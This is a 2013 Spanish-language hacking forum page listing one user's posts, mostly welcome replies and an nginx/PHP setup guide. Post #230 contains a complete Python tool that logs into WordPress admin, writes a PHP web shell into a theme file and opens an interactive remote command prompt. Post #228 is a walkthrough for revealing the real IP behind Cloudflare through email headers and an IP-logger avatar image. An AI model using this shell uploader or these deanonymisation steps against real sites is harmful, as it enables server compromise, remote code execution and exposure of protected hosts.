Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - ZanGetsu

#221
Presentaciones y cumpleaños / Re:N3rvi0zz0
Agosto 12, 2013, 10:25:36 PM
bienvenido brother, espero que te sientas a gusto en este gran foro,

un saludo!
#222
si eres usuario nuevo en linux, te recomiendo Linux Mint, ya que
viene con varias aplicaciones instaladas lo cual permite
su facilidad de uso, si este no fuera el caso, sin lugar a dudas Debian !

Saludos!
#223
Presentaciones y cumpleaños / Re:[Presentacion] pax01
Agosto 11, 2013, 08:23:24 PM
bienvenido, un gusto,

Saludos !
#224
Presentaciones y cumpleaños / Re:Me Presento Striker
Agosto 11, 2013, 04:47:45 PM
Bienvenido compañero, mucho gusto, si te gusta la lectura te invito
a pasar por la biblioteca virtual: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

un Saludo !
#225
Bugs y Exploits / Re:Bypass upload mal filtrado
Agosto 10, 2013, 07:59:20 PM
Muy buen post amigo, lo complemento con un video existente en underc0de:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos !
#226
Presentaciones y cumpleaños / Re:Me presento
Agosto 10, 2013, 04:33:29 PM
bienvenido bro, aca encotraras lo que buscas sin lugar a duda, Saludos !
#227
esta bastaante buena la firma, te felicito !
#228
Bugs y Exploits / Bypass Cloudflare (2 metodos)
Agosto 07, 2013, 07:23:46 AM

Hola, en el siguiente post veremos como bypasear un sitio (en este caso foro)
protegido por cloudflare,

Primeramente nos iremos al Ip Revealer de Underc0de : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

El cual nos entrega el siguiente resultado:


Claramente no nos entregara la ip verdadera, porque ya esta previamente configurado y no
con las config. por default de cloudflare,

Frente a esto tenemos 2 opciones :

1.- Nos registramos en el foro (en este caso monte el siguiente para no tener problemas ni quejas: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
esperamos nuestro e-mail de confirmación o bien si no pide confirmar, el de perdida de password, y miraremos el codigo de fuente
del mensaje recibido:


Y obtenemos la ip : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, la cual es la verdadera ip del website, pero

¿Que pasaria si nuestro website usa un mailer externo o no utilizan correos para reestablecer password y registros?

Pues pasaremos al segundo metodo:

2.- Iplogger: Iplogger es un sitio web que te permite ver el tráfico en los archivos de imagen. En este caso
nos entre una url para que podamos acceder al trafico de nuestra imagen y accederemos a la web :

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

En el cual en esta linea "Link to the untagged invisible picture: " nos entrega un link: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Ese link lo pondremos en elegir avatar en el foro de prueba:


Your profile has been updated successfully.

Iremos a la web de iplogger y daremos click en View Log, obteniendo el siguiente resultado:



Espero les haya gustado, un Saludo !
#229
muy bueno blackdead, sigue asi !
#230
Python / Auto - Wordpress Shell Uploader Beta
Agosto 05, 2013, 12:35:38 AM
Hola, les paso a dejar esta tool que permite cargar shells en sitios con wordpress
para cargarlas se necesita el usuario y la pass del wp-admin :D



Código: bash
#!/usr/bin/env python
#Install mechanize and Beautifulsoup
#easy_install mechanize,BeautifulSoup
#Give full url path to avoid issues
from BeautifulSoup import BeautifulSoup
import mechanize
from django.core.validators import URLValidator
from django.core.exceptions import Validationerror
import urllib2
import sys
import os

def check(main_url):

val = URLValidator(verify_exists=False)
try:
val(main_url)
except Validationerror, e:
print e
br = mechanize.Browser()
         br.set_handle_robots(False)
br.addheaders = [('User-agent', 'Python-urllib/2.6'),('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
# Give user-agent any shit u want

check = br.open(main_url)
html = check.read()
soup = BeautifulSoup(html)
search = soup.findAll('a',href="http://wordpress.org/")
for i in search:
if i['title'] == "Powered by WordPress":
return(1)
else:
exit(1)

def wp_sucker():

try:
br = mechanize.Browser()
                 br.set_handle_robots(False)
         print "[-] Enter the Worpress Site Login"
                 main_url = raw_input()
         stat = check(main_url)
                 if stat == 1:
                         pass
                 else:
                         print "[-] Enter a Wordpress Login Page Dumbass "
                         exit(0)
                                 sys.exit(0)
base_url = main_url.replace('/wp-login.php','')
br.addheaders = [('User-agent', 'Python-urllib/2.6'),('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
br.open(main_url)
br.select_form(nr=0)
print "[-] Enter UserName "
user_name = raw_input()
print "[-] Enter Password"
password = raw_input()
br.form['log'] = user_name
br.form['pwd'] = password
br.form.find_control('redirect_to').readonly = False
br.form['redirect_to'] = base_url+"/wp-admin/themes.php"
page = br.submit()
new = page.read()
#print html
#page = br.open(base_url+"/wp-admin/themes.php").read()
soup = BeautifulSoup(new)
search = soup.findAll('code')
#print search
#themes = ''
print "[-] Themes Available"
for i in search:
print i.text

print "[-] Select the Theme u would Like to upload the Shell"
theme = raw_input()
if theme == "twentyten":
Theme = "Twenty+Ten"
elif theme == "twentyeleven":
Theme ="Twenty+Eleven"
else:
Theme = theme.title()
url = base_url+"/wp-admin/theme-editor.php?file=/themes/%s/archive.php&theme=%s&dir=theme"%(theme,Theme)

br.open(url)
br.select_form(nr=1)
br.form['newcontent'] = "<?php system($_GET['cmd']) ?>"
br.submit()
print "[-] Shell Has been uploaded? Would like to interact.Enter y to interact"
answer = raw_input()
box = base_url.split('/')[2]
if answer == 'Y' or answer == 'y':
while True:
cmd = raw_input(box+"@box~")
if cmd == "exit":
print "[-] Terminal Exited "
print "[-] Shell Uploaded @"+base_url+"/wp-content/themes/%s/archive.php?cmd="%theme
os._exit(0)
#sys.exit(0)
else:
shell_url = base_url+"/wp-content/themes/%s/archive.php?cmd=%s"%(theme,cmd)
page = br.open(shell_url)
print page.read()
else:
print "[-] Shell has Been Uploaded Interact whenever U want"
print "[-] Shell Uploaded @"+base_url+"/wp-content/themes/twentyten/archive.php?cmd="
os._exit(0)
#exit(0)
#sys.exit(0)
except KeyboardInterrupt:
print"[-] trl^C Detected Shutting Down"
else:
print "[-] Something has gone wrong,Plse check ur Url or entered username or pass"
print "[-] Shutting Down"
exit()

def main():
print "-------------------------------------------"
print " Wordpress Shell Uploader"
print " Credits to HR,Phaedrus \n"
print " Login and get themes available for Upload"
print " And Uploads a basic cmd shell"
print "-------------------------------------------"
wp_sucker()
# shell_up()

main()

#EOF
#Hoping to add new shit :)


Author del Script: torque59,

un Saludo !
#231
Presentaciones y cumpleaños / Re:Saludos UnderC0de
Agosto 04, 2013, 08:41:30 PM
Bienvenido Bro :D
#232
Presentaciones y cumpleaños / Re:Me presento
Agosto 03, 2013, 03:39:15 AM
bienvenido nuevamente, ya te movi el tema al foro que corresponde,
un saludo !
#233
Presentaciones y cumpleaños / Re:Presentación
Agosto 02, 2013, 07:25:59 PM
bienvenido, un gusto ..
#234

Nginx es es un código abierto, libre de servidor de alto rendimiento HTTP y proxy inverso, así como un servidor proxy IMAP/POP3. Igor Sysoev comenzó el desarrollo de Nginx en 2002, con la primera versión pública en 2004 . Nginx ahora recibe casi el 12,18% (22.2M) de sitios activos en
todos los dominios. Nginx es conocido por su alto rendimiento, la estabilidad, el rico conjunto de características, configuración sencilla y de bajo consumo de recursos.

Instalacion:

Para empezar con la instalación, primero debemos instalar una dependencia:

Código: bash
# apt-get install build-essential libssl-dev libpcre3-dev


Instalando la librería podemos comenzar con la instalación en pleno de nginx,

Descargamos :

Código: bash
wget http://nginx.org/download/nginx-1.2.6.tar.gz


Lo Descomprimimos:

Código: bash
tar zxvf nginx-1.2.6.tar.gz


Ingresamos al directorio : cd nginx-1.2.6

Y compilamos :

Código: bash
- ./configure
- make
- make install


(recuerden ingresar como root o sudo)

Nginx tiene varios modulos disponibles, los cuales pueden ser descargamos desque aqui : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Para poder iniciar, reiniciar y parar nuestro nginx, necesitamos de un script, lo descargaremos :

Código: bash
- wget https://raw.github.com/JasonGiedymin/nginx-init-ubuntu/master/nginx
- sudo mv nginx /etc/init.d/nginx
- sudo chmod +x /etc/init.d/nginx
- sudo chown root:root /etc/init.d/nginx


ahora podremos iniciarlo correctamente:

Código: bash
/etc/init.d/nginx start
[ ok ] Starting Nginx Server...:.


Instalación de php5-fpm:

ejecutamos :

Código: bash
apt-get install php5-fpmv


Agregamos la siguiente llave:

Código: bash
- apt-get update 
- wget http://www.dotdeb.org/dotdeb.gpg
- cat dotdeb.gpg | sudo apt-key add -


Y podremos instalar php:

Código: bash
- apt-get install php5-cli php5-suhosin php5-fpm php5-cgi php5-mysql


Lo iniciamos

Código: bash
- /etc/init.d/php5-fpm start


Luego de eso en : /etc/nginx/nginx.conf , haremos los siguientes cambios :

Buscamos la linea que dice:

Código: bash
index                       index.php index.html index.htm;


Y le daremos prioridad a index.php tal como se ve en el ejemplo, luego el bloque

Código: bash
" upstream php " que apunta a PHP-FPM.

upstream php {
server 127.0.0.1:9000;


Y a lo ultimo del archivo agregaremos lo siguiente:

Código: bash
 location ~ \.php$ {
               include fastcgi_params;
               fastcgi_index index.php;
               fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
                              fastcgi_pass php;


Luego agregaremos lo siguiente al final del archivo : /usr/local/nginx/fastcgi_params

Código: bash
fastcgi_connect_timeout 60; 
fastcgi_send_timeout 180;
fastcgi_read_timeout 180;
fastcgi_buffer_size 128k;
fastcgi_buffers 4 256k;
fastcgi_busy_buffers_size 256k;
fastcgi_temp_file_write_size 256k;
fastcgi_intercept_errors on;


Y reiniciamos nuestro nginx : service nginx restart

Instalación en Windows:


Bueno en Windows todo es mas fácil, la instalación de nginx también, primero debemos descargar lo siguiente:

Código: bash
http://www.mediafire.com/download/kzx7jj3b5smv945/winginx-setup.exe


Bueno típico de Windows, solo debemos dar siguiente, siguiente, siguiente...,


En esta parte vamos a elegir que instalar, ya que podemos instalar
mysql, phpmyadmin, php, etc


Y bueno en nuestro disco C, tendremos listo todo instalado simple, en la carpeta se encuentran el Start, el Stop y el Hosteditor, el cual nos servirá para poner nuestra ip publica:


A lo ultimo se ve mi ip agregada, y el nombre de la carpeta contenedora
"zangetsu" y listo, tendremos nuestro servidor corriendo correctamente,

Para ingresar a phpmyadmin, iremos a la dirección You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, con el
user por defecto "root" y ya podremos administrar correctamente,

Un Saludo !
#235
interesante, me servirá, gracias
#236
Presentaciones y cumpleaños / Re:Hola Underc0de
Julio 30, 2013, 01:14:08 AM
bienvenido neod0g, disfruta del foro :D
#237
si quieres iniciarte bien, empieza a estudiar conceptos para que no quedes obsoleto
en lo que lees, y bueno registrandote en underc0de ya empezaste con el pie derecho para aprender,

un saludo !
#238
Seguridad / Re:Sistemas IPS/IDS/HIPS
Julio 28, 2013, 05:10:28 PM
buen aporte amigo, gracias
#239
gracias por el aporte  ;)
#240
Underc0de / Re:IRC Underc0de
Julio 27, 2013, 02:28:15 PM
yo no puedo entrar, pero ya se recuperará :D